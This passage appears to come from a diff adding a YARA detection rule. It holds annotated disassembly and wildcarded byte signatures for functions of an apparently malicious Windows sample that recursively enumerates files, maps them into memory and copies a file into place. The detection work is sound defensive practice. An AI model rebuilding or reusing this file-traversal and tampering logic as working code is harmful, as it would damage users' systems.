ecx,dword [esi + ecx * 2] + .text:0x0040167f 8b742420 mov esi,dword [esp + 32] + .text:0x00401683 894c2410 mov dword [esp + 16],ecx + .text:0x00401687 8b4c2430 mov ecx,dword [esp + 48] + .text:0x0040168b 894c2418 mov dword [esp + 24],ecx + .text:0x0040168f 8b4c2434 mov ecx,dword [esp + 52] + .text:0x00401693 894c2414 mov dword [esp + 20],ecx + .text:0x00401697 8bcf mov ecx,edi + .text:0x00401699 2bce sub ecx,esi + .text:0x0040169b 894c2440 mov dword [esp + 64],ecx + .text:0x0040169f loc_0040169f: [1 XREFS] + .text:0x0040169f 8b742414 mov esi,dword [esp + 20] + .text:0x004016a3 33c9 xor ecx,ecx + .text:0x004016a5 668b0e mov cx,word [esi] + .text:0x004016a8 3bca cmp ecx,edx + .text:0x004016aa 0f85d3000000 jnz 0x00401783 + .text:0x004016b0 8b542458 mov edx,dword [esp + 88] + .text:0x004016b4 8b4c2418 mov ecx,dword [esp + 24] + .text:0x004016b8 8b442438 mov eax,dword [esp + 56] + .text:0x004016bc 52 push edx + .text:0x004016bd 8b11 mov edx,dword [ecx] + .text:0x004016bf 50 push eax + .text:0x004016c0 52 push edx + .text:0x004016c1 e87af9ffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004014d4>) + .text:0x004016c6 8bd0 mov edx,eax + .text:0x004016c8 83c9ff or ecx,0xffffffff + .text:0x004016cb 8bfa mov edi,edx + .text:0x004016cd 33c0 xor eax,eax + .text:0x004016cf 83c40c add esp,12 + .text:0x004016d2 8bf2 mov esi,edx + .text:0x004016d4 f2ae repnz: scasb + .text:0x004016d6 f7d1 not ecx + .text:0x004016d8 8bc1 mov eax,ecx + .text:0x004016da 8bfb mov edi,ebx + .text:0x004016dc c1e902 shr ecx,2 + .text:0x004016df f3a5 rep: movsd + .text:0x004016e1 8bc8 mov ecx,eax + .text:0x004016e3 8b442410 mov eax,dword [esp + 16] + .text:0x004016e7 83e103 and ecx,3 + .text:0x004016ea f3a4 rep: movsb + .text:0x004016ec 668b4c245c mov cx,word [esp + 92] + .text:0x004016f1 8b74243c mov esi,dword [esp + 60] + .text:0x004016f5 668908 mov word [eax],cx + .text:0x004016f8 8b442440 mov eax,dword [esp + 64] + .text:0x004016fc 8d0c33 lea ecx,dword [ebx + esi] + .text:0x004016ff 8bfa mov edi,edx + .text:0x00401701 890c28 mov dword [eax + ebp],ecx + .text:0x00401704 83c9ff or ecx,0xffffffff + .text:0x00401707 33c0 xor eax,eax + .text:0x00401709 f2ae repnz: scasb + .text:0x0040170b f7d1 not ecx + .text:0x0040170d 49 dec ecx + .text:0x0040170e 8bfa mov edi,edx + .text:0x00401710 8d5c0b01 lea ebx,dword [ebx + ecx + 1] + .text:0x00401714 8bc3 mov eax,ebx + .text:0x00401716 8d0c33 lea ecx,dword [ebx + esi] + .text:0x00401719 83c309 add ebx,9 + .text:0x0040171c 894d00 mov dword [ebp],ecx + .text:0x0040171f 8b0d70304000 mov ecx,dword [0x00403070] + .text:0x00401725 8908 mov dword [eax],ecx + .text:0x00401727 8b0d74304000 mov ecx,dword [0x00403074] + .text:0x0040172d 8bf2 mov esi,edx + .text:0x0040172f 894804 mov dword [eax + 4],ecx + .text:0x00401732 8a0d78304000 mov cl,byte [0x00403078] + .text:0x00401738 884808 mov byte [eax + 8],cl + .text:0x0040173b 83c9ff or ecx,0xffffffff + .text:0x0040173e 33c0 xor eax,eax + .text:0x00401740 f2ae repnz: scasb + .text:0x00401742 f7d1 not ecx + .text:0x00401744 8bc1 mov eax,ecx + .text:0x00401746 8bfb mov edi,ebx + .text:0x00401748 c1e902 shr ecx,2 + .text:0x0040174b f3a5 rep: movsd + .text:0x0040174d 8bc8 mov ecx,eax + .text:0x0040174f 33c0 xor eax,eax + .text:0x00401751 83e103 and ecx,3 + .text:0x00401754 f3a4 rep: movsb + .text:0x00401756 8bfa mov edi,edx + .text:0x00401758 83c9ff or ecx,0xffffffff + .text:0x0040175b f2ae repnz: scasb + .text:0x0040175d 8b54245c mov edx,dword [esp + 92] + .text:0x00401761 8b442424 mov eax,dword [esp + 36] + .text:0x00401765 f7d1 not ecx + .text:0x00401767 49 dec ecx + .text:0x00401768 42 inc edx + .text:0x00401769 8954245c mov dword [esp + 92],edx + .text:0x0040176d 8b54242c mov edx,dword [esp + 44] + .text:0x00401771 8d5c0b01 lea ebx,dword [ebx + ecx + 1] + .text:0x00401775 8b4c2410 mov ecx,dword [esp + 16] + .text:0x00401779 83c102 add ecx,2 + .text:0x0040177c 83c504 add ebp,4 + .text:0x0040177f 894c2410 mov dword [esp + 16],ecx + .text:0x00401783 loc_00401783: [1 XREFS] + .text:0x00401783 8b742414 mov esi,dword [esp + 20] + .text:0x00401787 8b4c2428 mov ecx,dword [esp + 40] + .text:0x0040178b 8b7c2418 mov edi,dword [esp + 24] + .text:0x0040178f 83c602 add esi,2 + .text:0x00401792 89742414 mov dword [esp + 20],esi + .text:0x00401796 8b7018 mov esi,dword [eax + 24] + .text:0x00401799 41 inc ecx + .text:0x0040179a 83c704 add edi,4 + .text:0x0040179d 3bce cmp ecx,esi + .text:0x0040179f 894c2428 mov dword [esp + 40],ecx + .text:0x004017a3 897c2418 mov dword [esp + 24],edi + .text:0x004017a7 0f82f2feffff jc 0x0040169f + .text:0x004017ad 8b4c245c mov ecx,dword [esp + 92] + .text:0x004017b1 8b7c2444 mov edi,dword [esp + 68] + .text:0x004017b5 8b742448 mov esi,dword [esp + 72] + .text:0x004017b9 loc_004017b9: [2 XREFS] + .text:0x004017b9 8b6c241c mov ebp,dword [esp + 28] + .text:0x004017bd 42 inc edx + .text:0x004017be 83c504 add ebp,4 + .text:0x004017c1 8954242c mov dword [esp + 44],edx + .text:0x004017c5 896c241c mov dword [esp + 28],ebp + .text:0x004017c9 8b6814 mov ebp,dword [eax + 20] + .text:0x004017cc 3bd5 cmp edx,ebp + .text:0x004017ce 0f827ffeffff jc 0x00401653 + .text:0x004017d4 loc_004017d4: [1 XREFS] + .text:0x004017d4 8b4c244c mov ecx,dword [esp + 76] + .text:0x004017d8 8b3500204000 mov esi,dword [0x00402000] + .text:0x004017de 51 push ecx + .text:0x004017df ffd6 call esi ;kernel32.CloseHandle(<0x004014ac>) + .text:0x004017e1 8b542450 mov edx,dword [esp + 80] + .text:0x004017e5 52 push edx + .text:0x004017e6 ffd6 call esi ;kernel32.CloseHandle(<0x004014f0>) + .text:0x004017e8 6a00 push 0 + .text:0x004017ea 684c304000 push 0x0040304c + .text:0x004017ef 687c304000 push 0x0040307c + .text:0x004017f4 ff1524204000 call dword [0x00402024] ;kernel32.CopyFileA(0x0040307c,0x0040304c,0) + .text:0x004017fa 85c0 test eax,eax + .text:0x004017fc 6a00 push 0 + .text:0x004017fe 7506 jnz 0x00401806 + .text:0x00401800 ff1530204000 call dword [0x00402030] ;msvcrt.exit(0) + .text:0x00401806 loc_00401806: [1 XREFS] + .text:0x00401806 6844304000 push 0x00403044 + .text:0x0040180b e8d0f9ffff call 0x004011e0 ;sub_004011e0(0x00403044,0) + .text:0x00401810 83c408 add esp,8 + .text:0x00401813 loc_00401813: [2 XREFS] + .text:0x00401813 5f pop edi + .text:0x00401814 5e pop esi + .text:0x00401815 5d pop ebp + .text:0x00401816 33c0 xor eax,eax + .text:0x00401818 5b pop ebx + .text:0x00401819 83c444 add esp,68 + .text:0x0040181c c3 ret + */ + $c0 = { 8B 44 24 ?? 83 EC 44 83 F8 02 53 55 56 57 0F 85 ?? ?? ?? ?? 8B 44 24 ?? BE B0 30 40 00 8B 40 ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? 83 C0 02 83 C6 02 84 C9 75 ?? 33 C0 EB ?? 1B C0 83 D8 FF 85 C0 0F 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 50 6A 03 50 6A 01 68 00 00 00 80 68 8C 30 40 00 FF D7 8B 1D ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 6A 00 50 89 44 24 ?? FF D3 8B 2D ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 04 50 FF D5 6A 00 6A 00 6A 03 6A 00 6A 01 8B F0 68 00 00 00 10 68 7C 30 40 00 89 74 24 ?? FF D7 83 F8 FF 89 44 24 ?? 6A 00 75 ?? FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 04 6A 00 50 FF D3 83 F8 FF 6A 00 75 ?? FF 15 ?? ?? ?? ?? 6A 00 6A 00 68 1F 00 0F 00 50 FF D5 8B E8 85 ED 89 6C 24 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 8B 7E ?? 56 03 FE 57 89 7C 24 ?? 8B 47 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 55 03 F5 8B D8 56 89 5C 24 ?? 8B 4E ?? 51 E8 ?? ?? ?? ?? 8B 54 24 ?? 8B E8 8B 43 ?? 52 57 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 53 ?? 51 57 52 89 44 24 ?? E8 ?? ?? ?? ?? 8B 4B ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 50 57 51 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 7E ?? 89 44 24 ?? 8B 46 ?? 52 56 50 E8 ?? ?? ?? ?? 8B CF 8B F3 8B D1 8B FD C1 E9 02 F3 A5 8B CA 83 C4 48 83 E1 03 89 44 24 ?? F3 A4 8B 4B ?? 89 4D ?? 8B 53 ?? 8D 5D ?? 89 55 ?? C1 E1 04 8D 14 03 89 55 ?? 8B 35 ?? ?? ?? ?? 8B D3 83 C3 10 89 5C 24 ?? 89 32 8B 35 ?? ?? ?? ?? 89 72 ?? 8B 35 ?? ?? ?? ?? 89 72 ?? 8B 35 ?? ?? ?? ?? 89 72 ?? 8B 55 ?? 8D 34 93 8D 3C D3 89 74 24 ?? 89 7C 24 ?? 8D 14 03 03 D9 89 55 ?? 8D 14 06 03 C7 89 55 ?? 89 45 ?? 8B 44 24 ?? 33 C9 33 D2 8B 68 ?? 89 4C 24 ?? 85 ED 89 54 24 ?? 0F 86 ?? ?? ?? ?? 8B 6C 24 ?? 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 68 ?? C7 44 24 ?? 00 00 00 00 85 ED 0F 86 ?? ?? ?? ?? 8B 6C 24 ?? 8D 6C 8D ?? 8D 0C 4E 8B 74 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B CF 2B CE 89 4C 24 ?? 8B 74 24 ?? 33 C9 66 8B 0E 3B CA 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? 52 8B 11 50 52 E8 ?? ?? ?? ?? 8B D0 83 C9 FF 8B FA 33 C0 83 C4 0C 8B F2 F2 AE F7 D1 8B C1 8B FB C1 E9 02 F3 A5 8B C8 8B 44 24 ?? 83 E1 03 F3 A4 66 8B 4C 24 ?? 8B 74 24 ?? 66 89 08 8B 44 24 ?? 8D 0C 33 8B FA 89 0C 28 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FA 8D 5C 0B ?? 8B C3 8D 0C 33 83 C3 09 89 4D ?? 8B 0D ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8B F2 89 48 ?? 8A 0D ?? ?? ?? ?? 88 48 ?? 83 C9 FF 33 C0 F2 AE F7 D1 8B C1 8B FB C1 E9 02 F3 A5 8B C8 33 C0 83 E1 03 F3 A4 8B FA 83 C9 FF F2 AE 8B 54 24 ?? 8B 44 24 ?? F7 D1 49 42 89 54 24 ?? 8B 54 24 ?? 8D 5C 0B ?? 8B 4C 24 ?? 83 C1 02 83 C5 04 89 4C 24 ?? 8B 74 24 ?? 8B 4C 24 ?? 8B 7C 24 ?? 83 C6 02 89 74 24 ?? 8B 70 ?? 41 83 C7 04 3B CE 89 4C 24 ?? 89 7C 24 ?? 0F 82 ?? ?? ?? ?? 8B 4C 24 ?? 8B 7C 24 ?? 8B 74 24 ?? 8B 6C 24 ?? 42 83 C5 04 89 54 24 ?? 89 6C 24 ?? 8B 68 ?? 3B D5 0F 82 ?? ?? ?? ?? 8B 4C 24 ?? 8B 35 ?? ?? ?? ?? 51 FF D6 8B 54 24 ?? 52 FF D6 6A 00 68 4C 30 40 00 68 7C 30 40 00 FF 15 ?? ?? ?? ?? 85 C0 6A 00 75 ?? FF 15 ?? ?? ?? ?? 68 44 30 40 00 E8 ?? ?? ?? ?? 83 C4 08 5F 5E 5D 33 C0 5B 83 C4 44 C3 } + /* +function at 0x004011e0@bb7425b82141a1c0f7d60e5106676bb1 with 2 features: + - enumerate files on Windows + - enumerate files recursively + .text:0x004011e0 + .text:0x004011e0 FUNC: int cdecl sub_004011e0( int arg0, int arg1, ) [4 XREFS] + .text:0x004011e0 + .text:0x004011e0 Stack Variables: (offset from initial top of stack) + .text:0x004011e0 8: int arg1 + .text:0x004011e0 4: int arg0 + .text:0x004011e0 -275: int local275 + .text:0x004011e0 -276: int local276 + .text:0x004011e0 -281: int local281 + .text:0x004011e0 -320: int local320 + .text:0x004011e0 -324: int local324 + .text:0x004011e0 + .text:0x004011e0 8b442408 mov eax,dword [esp + 8] + .text:0x004011e4 81ec44010000 sub esp,324 + .text:0x004011ea 83f807 cmp eax,7 + .text:0x004011ed 53 push ebx + .text:0x004011ee 55 push ebp + .text:0x004011ef 56 push esi + .text:0x004011f0 57 push edi + .text:0x004011f1 0f8f3d020000 jg 0x00401434 + .text:0x004011f7 8bac2458010000 mov ebp,dword [esp + 344] + .text:0x004011fe 8d442414 lea eax,dword [esp + 20] + .text:0x00401202 50 push eax + .text:0x00401203 55 push ebp + .text:0x00401204 ff1520204000 call dword [0x00402020] ;kernel32.FindFirstFileA(arg0,local320) + .text:0x0040120a 8bf0 mov esi,eax + .text:0x0040120c 89742410 mov dword [esp + 16],esi + .text:0x00401210 loc_00401210: [1 XREFS] + .text:0x00401210 83feff cmp esi,0xffffffff + .text:0x00401213 0f8413020000 jz 0x0040142c + .text:0x00401219 f644241410 test byte [esp + 20],16 + .text:0x0040121e 0f8438010000 jz 0x0040135c + .text:0x00401224 be40304000 mov esi,0x00403040 + .text:0x00401229 8d442440 lea eax,dword [esp + 64] + .text:0x0040122d loc_0040122d: [1 XREFS] + .text:0x0040122d 8a10 mov dl,byte [eax] + .text:0x0040122f 8a1e mov bl,byte [esi] + .text:0x00401231 8aca mov cl,dl + .text:0x00401233 3ad3 cmp dl,bl + .text:0x00401235 751e jnz 0x00401255 + .text:0x00401237 84c9 test cl,cl + .text:0x00401239 7416 jz 0x00401251 + .text:0x0040123b 8a5001 mov dl,byte [eax + 1] + .text:0x0040123e 8a5e01 mov bl,byte [esi + 1] + .text:0x00401241 8aca mov cl,dl + .text:0x00401243 3ad3 cmp dl,bl + .text:0x00401245 750e jnz 0x00401255 + .text:0x00401247 83c002 add eax,2 + .text:0x0040124a 83c602 add esi,2 + .text:0x0040124d 84c9 test cl,cl + .text:0x0040124f 75dc jnz 0x0040122d + .text:0x00401251 loc_00401251: [1 XREFS] + .text:0x00401251 33c0 xor eax,eax + .text:0x00401253 eb05 jmp 0x0040125a + .text:0x00401255 loc_00401255: [2 XREFS] + .text:0x00401255 1bc0 sbb eax,eax + .text:0x00401257 83d8ff sbb eax,0xffffffff + .text:0x0040125a loc_0040125a: [1 XREFS] + .text:0x0040125a 85c0 test eax,eax + .text:0x0040125c 0f84fa000000 jz 0x0040135c + .text:0x00401262 be3c304000 mov esi,0x0040303c + .text:0x00401267 8d442440 lea eax,dword [esp + 64] + .text:0x0040126b loc_0040126b: [1 XREFS] + .text:0x0040126b 8a10 mov dl,byte [eax] + .text:0x0040126d 8a1e mov bl,byte [esi] + .text:0x0040126f 8aca mov cl,dl + .text:0x00401271 3ad3 cmp dl,bl + .text:0x00401273 751e jnz 0x00401293 + .text:0x00401275 84c9 test cl,cl + .text:0x00401277 7416 jz 0x0040128f + .text:0x00401279 8a5001 mov dl,byte [eax + 1] + .text:0x0040127c 8a5e01 mov bl,byte [esi + 1] + .text:0x0040127f 8aca mov cl,dl + .text:0x00401281 3ad3 cmp dl,bl + .text:0x00401283 750e jnz 0x00401293 + .text:0x00401285 83c002 add eax,2 + .text:0x00401288 83c602 add esi,2 + .text:0x0040128b 84c9 test cl,cl + .text:0x0040128d 75dc jnz 0x0040126b + .text:0x0040128f loc_0040128f: [1 XREFS] + .text:0x0040128f 33c0 xor eax,eax + .text:0x00401291 eb05 jmp 0x00401298 + .text:0x00401293 loc_00401293: [2 XREFS] + .text:0x00401293 1bc0 sbb eax,eax + .text:0x00401295 83d8ff sbb eax,0xffffffff + .text:0x00401298 loc_00401298: [1 XREFS] + .text:0x00401298 85c0 test eax,eax + .text:0x0040129a 0f84bc000000 jz 0x0040135c + .text:0x004012a0 8d7c2440 lea edi,dword [esp + 64] + .text:0x004012a4 83c9ff or ecx,0xffffffff + .text:0x004012a7 33c0 xor eax,eax + .text:0x004012a9 f2ae repnz: scasb + .text:0x004012ab f7d1 not ecx + .text:0x004012ad 49 dec ecx + .text:0x004012ae 8bfd mov edi,ebp + .text:0x004012b0 8bd1 mov edx,ecx + .text:0x004012b2 83c9ff or ecx,0xffffffff + .text:0x004012b5 f2ae repnz: scasb + .text:0x004012b7 f7d1 not ecx + .text:0x004012b9 49 dec ecx + .text:0x004012ba 8d445106 lea eax,dword [ecx + edx * 2 + 6] + .text:0x004012be 50 push eax + .text:0x004012bf ff152c204000 call dword [0x0040202c] ;msvcrt.malloc(3) + .text:0x004012c5 8bd0 mov edx,eax + .text:0x004012c7 83c9ff or ecx,0xffffffff + .text:0x004012ca 8bfd mov edi,ebp + .text:0x004012cc 33c0 xor eax,eax + .text:0x004012ce f2ae repnz: scasb + .text:0x004012d0 f7d1 not ecx + .text:0x004012d2 2bf9 sub edi,ecx + .text:0x004012d4 8bc1 mov eax,ecx + .text:0x004012d6 8bf7 mov esi,edi + .text:0x004012d8 c1e902 shr ecx,2 + .text:0x004012db 8bfa mov edi,edx + .text:0x004012dd f3a5 rep: movsd + .text:0x004012df 8bc8 mov ecx,eax + .text:0x004012e1 33c0 xor eax,eax + .text:0x004012e3 83e103 and ecx,3 + .text:0x004012e6 f3a4 rep: movsb + .text:0x004012e8 83c9ff or ecx,0xffffffff + .text:0x004012eb 8bfd mov edi,ebp + .text:0x004012ed f2ae repnz: scasb + .text:0x004012ef f7d1 not ecx + .text:0x004012f1 49 dec ecx + .text:0x004012f2 8d7c2444 lea edi,dword [esp + 68] + .text:0x004012f6 884411ff mov byte [ecx + edx + -1],al + .text:0x004012fa 83c9ff or ecx,0xffffffff + .text:0x004012fd f2ae repnz: scasb + .text:0x004012ff f7d1 not ecx + .text:0x00401301 2bf9 sub edi,ecx + .text:0x00401303 8bf7 mov esi,edi + .text:0x00401305 8bd9 mov ebx,ecx + .text:0x00401307 8bfa mov edi,edx + .text:0x00401309 83c9ff or ecx,0xffffffff + .text:0x0040130c f2ae repnz: scasb + .text:0x0040130e 8bcb mov ecx,ebx + .text:0x00401310 4f dec edi + .text:0x00401311 c1e902 shr ecx,2 + .text:0x00401314 f3a5 rep: movsd + .text:0x00401316 8bcb mov ecx,ebx + .text:0x00401318 83e103 and ecx,3 + .text:0x0040131b f3a4 rep: movsb + .text:0x0040131d bf38304000 mov edi,0x00403038 + .text:0x00401322 83c9ff or ecx,0xffffffff + .text:0x00401325 f2ae repnz: scasb + .text:0x00401327 f7d1 not ecx + .text:0x00401329 2bf9 sub edi,ecx + .text:0x0040132b 8bf7 mov esi,edi + .text:0x0040132d 8bd9 mov ebx,ecx + .text:0x0040132f 8bfa mov edi,edx + .text:0x00401331 83c9ff or ecx,0xffffffff + .text:0x00401334 f2ae repnz: scasb + .text:0x00401336 8bcb mov ecx,ebx + .text:0x00401338 4f dec edi + .text:0x00401339 c1e902 shr ecx,2 + .text:0x0040133c f3a5 rep: movsd + .text:0x0040133e 8bcb mov ecx,ebx + .text:0x00401340 83e103 and ecx,3 + .text:0x00401343 f3a4 rep: movsb + .text:0x00401345 8b8c2460010000 mov ecx,dword [esp + 352] + .text:0x0040134c 41 inc ecx + .text:0x0040134d 51 push ecx + .text:0x0040134e 52 push edx + .text:0x0040134f e88cfeffff call 0x004011e0 ;sub_004011e0() + .text:0x00401354 83c40c add esp,12 + .text:0x00401357 e9b7000000 jmp 0x00401413 + .text:0x0040135c loc_0040135c: [3 XREFS] + .text:0x0040135c 8d7c2440 lea edi,dword [esp + 64] + .text:0x00401360 83c9ff or ecx,0xffffffff + .text:0x00401363 33c0 xor eax,eax + .text:0x00401365 f2ae repnz: scasb + .text:0x00401367 f7d1 not ecx + .text:0x00401369 49 dec ecx + .text:0x0040136a 8bfd mov edi,ebp + .text:0x0040136c 8d5c0c3c lea ebx,dword [esp + ecx + 60] + .text:0x00401370 83c9ff or ecx,0xffffffff + .text:0x00401373 f2ae repnz: scasb + .text:0x00401375 f7d1 not ecx + .text:0x00401377 49 dec ecx + .text:0x00401378 8d7c2440 lea edi,dword [esp + 64] + .text:0x0040137c 8bd1 mov edx,ecx + .text:0x0040137e 83c9ff or ecx,0xffffffff + .text:0x00401381 f2ae repnz: scasb + .text:0x00401383 f7d1 not ecx + .text:0x00401385 49 dec ecx + .text:0x00401386 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040138a 50 push eax + .text:0x0040138b ff152c204000 call dword [0x0040202c] ;msvcrt.malloc(0xffffffff) + .text:0x00401391 8b94245c010000 mov edx,dword [esp + 348] + .text:0x00401398 8be8 mov ebp,eax + .text:0x0040139a 8bfa mov edi,edx + .text:0x0040139c 83c9ff or ecx,0xffffffff + .text:0x0040139f 33c0 xor eax,eax + .text:0x004013a1 6830304000 push 0x00403030 + .text:0x004013a6 f2ae repnz: scasb + .text:0x004013a8 f7d1 not ecx + .text:0x004013aa 2bf9 sub edi,ecx + .text:0x004013ac 53 push ebx + .text:0x004013ad 8bc1 mov eax,ecx + .text:0x004013af 8bf7 mov esi,edi + .text:0x004013b1 8bfd mov edi,ebp + .text:0x004013b3 c1e902 shr ecx,2 + .text:0x004013b6 f3a5 rep: movsd + .text:0x004013b8 8bc8 mov ecx,eax + .text:0x004013ba 33c0 xor eax,eax + .text:0x004013bc 83e103 and ecx,3 + .text:0x004013bf f3a4 rep: movsb + .text:0x004013c1 8bfa mov edi,edx + .text:0x004013c3 83c9ff or ecx,0xffffffff + .text:0x004013c6 f2ae repnz: scasb + .text:0x004013c8 f7d1 not ecx + .text:0x004013ca 49 dec ecx + .text:0x004013cb 8d7c244c lea edi,dword [esp + 76] + .text:0x004013cf 884429ff mov byte [ecx + ebp + -1],al + .text:0x004013d3 83c9ff or ecx,0xffffffff + .text:0x004013d6 f2ae repnz: scasb + .text:0x004013d8 f7d1 not ecx + .text:0x004013da 2bf9 sub edi,ecx + .text:0x004013dc 8bf7 mov esi,edi + .text:0x004013de 8bd1 mov edx,ecx + .text:0x004013e0 8bfd mov edi,ebp + .text:0x004013e2 83c9ff or ecx,0xffffffff + .text:0x004013e5 f2ae repnz: scasb + .text:0x004013e7 8bca mov ecx,edx + .text:0x004013e9 4f dec edi + .text:0x004013ea c1e902 shr ecx,2 + .text:0x004013ed f3a5 rep: movsd + .text:0x004013ef 8bca mov ecx,edx + .text:0x004013f1 83e103 and ecx,3 + .text:0x004013f4 f3a4 rep: movsb + .text:0x004013f6 ff1564204000 call dword [0x00402064] ;msvcrt._stricmp(local281,0x00403030) + .text:0x004013fc 83c40c add esp,12 + .text:0x004013ff 85c0 test eax,eax + .text:0x00401401 7509 jnz 0x0040140c + .text:0x00401403 55 push ebp + .text:0x00401404 e897fcffff call 0x004010a0 ;sub_004010a0(msvcrt.malloc(0xffffffff)) + .text:0x00401409 83c404 add esp,4 + .text:0x0040140c loc_0040140c: [1 XREFS] + .text:0x0040140c 8bac2458010000 mov ebp,dword [esp + 344] + .text:0x00401413 loc_00401413: [1 XREFS] + .text:0x00401413 8b742410 mov esi,dword [esp + 16] + .text:0x00401417 8d442414 lea eax,dword [esp + 20] + .text:0x0040141b 50 push eax + .text:0x0040141c 56 push esi + .text:0x0040141d ff151c204000 call dword [0x0040201c] ;kernel32.FindNextFileA(kernel32.FindFirstFileA(arg0,local320),local320) + .text:0x00401423 85c0 test eax,eax + .text:0x00401425 740d jz 0x00401434 + .text:0x00401427 e9e4fdffff jmp 0x00401210 + .text:0x0040142c loc_0040142c: [1 XREFS] + .text:0x0040142c 6aff push 0xffffffff + .text:0x0040142e ff1518204000 call dword [0x00402018] ;kernel32.FindClose(0xffffffff) + .text:0x00401434 loc_00401434: [2 XREFS] + .text:0x00401434 5f pop edi + .text:0x00401435 5e pop esi + .text:0x00401436 5d pop ebp + .text:0x00401437 5b pop ebx + .text:0x00401438 81c444010000 add esp,324 + .text:0x0040143e c3 ret + */ + $c1 = { 8B 44 24 ?? 81 EC 44 01 00 00 83 F8 07 53 55 56 57 0F 8F ?? ?? ?? ?? 8B AC 24 ?? ?? ?? ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 83 FE FF 0F 84 ?? ?? ?? ?? F6 44 24 ?? 10 0F 84 ?? ?? ?? ?? BE 40 30 40 00 8D 44 24 ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? 83 C0 02 83 C6 02 84 C9 75 ?? 33 C0 EB ?? 1B C0 83 D8 FF 85 C0 0F 84 ?? ?? ?? ?? BE 3C 30 40 00 8D 44 24 ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? 83 C0 02 83 C6 02 84 C9 75 ?? 33 C0 EB ?? 1B C0 83 D8 FF 85 C0 0F 84 ?? ?? ?? ?? 8D 7C 24 ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FD 8B D1 83 C9 FF F2 AE F7 D1 49 8D 44 51 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 83 C9 FF 8B FD 33 C0 F2 AE F7 D1 2B F9 8B C1 8B F7 C1 E9 02 8B FA F3 A5 8B C8 33 C0 83 E1 03 F3 A4 83 C9 FF 8B FD F2 AE F7 D1 49 8D 7C 24 ?? 88 44 11 ?? 83 C9 FF F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF F2 AE 8B CB 4F C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 38 30 40 00 83 C9 FF F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF F2 AE 8B CB 4F C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 8B 8C 24 ?? ?? ?? ?? 41 51 52 E8 ?? ?? ?? ?? 83 C4 0C E9 ?? ?? ?? ?? 8D 7C 24 ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FD 8D 5C 0C ?? 83 C9 FF F2 AE F7 D1 49 8D 7C 24 ?? 8B D1 83 C9 FF F2 AE F7 D1 49 8D 44 0A ?? 50 FF 15 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B E8 8B FA 83 C9 FF 33 C0 68 30 30 40 00 F2 AE F7 D1 2B F9 53 8B C1 8B F7 8B FD C1 E9 02 F3 A5 8B C8 33 C0 83 E1 03 F3 A4 8B FA 83 C9 FF F2 AE F7 D1 49 8D 7C 24 ?? 88 44 29 ?? 83 C9 FF F2 AE F7 D1 2B F9 8B F7 8B D1 8B FD 83 C9 FF F2 AE 8B CA 4F C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 FF 15 ?? ?? ?? ?? 83 C4 0C 85 C0 75 ?? 55 E8 ?? ?? ?? ?? 83 C4 04 8B AC 24 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? 6A FF FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 44 01 00 00 C3 } + /* +function at 0x004010a0@bb7425b82141a1c0f7d60e5106676bb1 with 1 features: + - read file via mapping + .text:0x004010a0 + .text:0x004010a0 FUNC: int cdecl sub_004010a0( int arg0, ) [2 XREFS] + .text:0x004010a0 + .text:0x004010a0 Stack Variables: (offset from initial top of stack) + .text:0x004010a0 4: int arg0 + .text:0x004010a0 -4: int local4 + .text:0x004010a0 -8: int local8 + .text:0x004010a0 -12: int local12 + .text:0x004010a0 + .text:0x004010a0 83ec0c sub esp,12 + .text:0x004010a3 53 push ebx + .text:0x004010a4 8b442414 mov eax,dword [esp + 20] + .text:0x004010a8 55 push ebp + .text:0x004010a9 56 push esi + .text:0x004010aa 57 push edi + .text:0x004010ab 6a00 push 0 + .text:0x004010ad 6a00 push 0 + .text:0x004010af 6a03 push 3 + .text:0x004010b1 6a00 push 0 + .text:0x004010b3 6a01 push 1 + .text:0x004010b5 6800000010 push 0x10000000 + .text:0x004010ba 50 push eax + .text:0x004010bb ff1514204000 call dword [0x00402014] ;kernel32.CreateFileA(arg0,0x10000000,1,0,3,0,0) + .text:0x004010c1 6a00 push 0 + .text:0x004010c3 6a00 push 0 + .text:0x004010c5 6a00 push 0 + .text:0x004010c7 6a04 push 4 + .text:0x004010c9 6a00 push 0 + .text:0x004010cb 50 push eax + .text:0x004010cc 89442430 mov dword [esp + 48],eax + .text:0x004010d0 ff1510204000 call dword [0x00402010] ;kernel32.CreateFileMappingA(kernel32.CreateFileA(arg0,0x10000000,1,0,3,0,0),0,4,0,0,0) + .text:0x004010d6 6a00 push 0 + 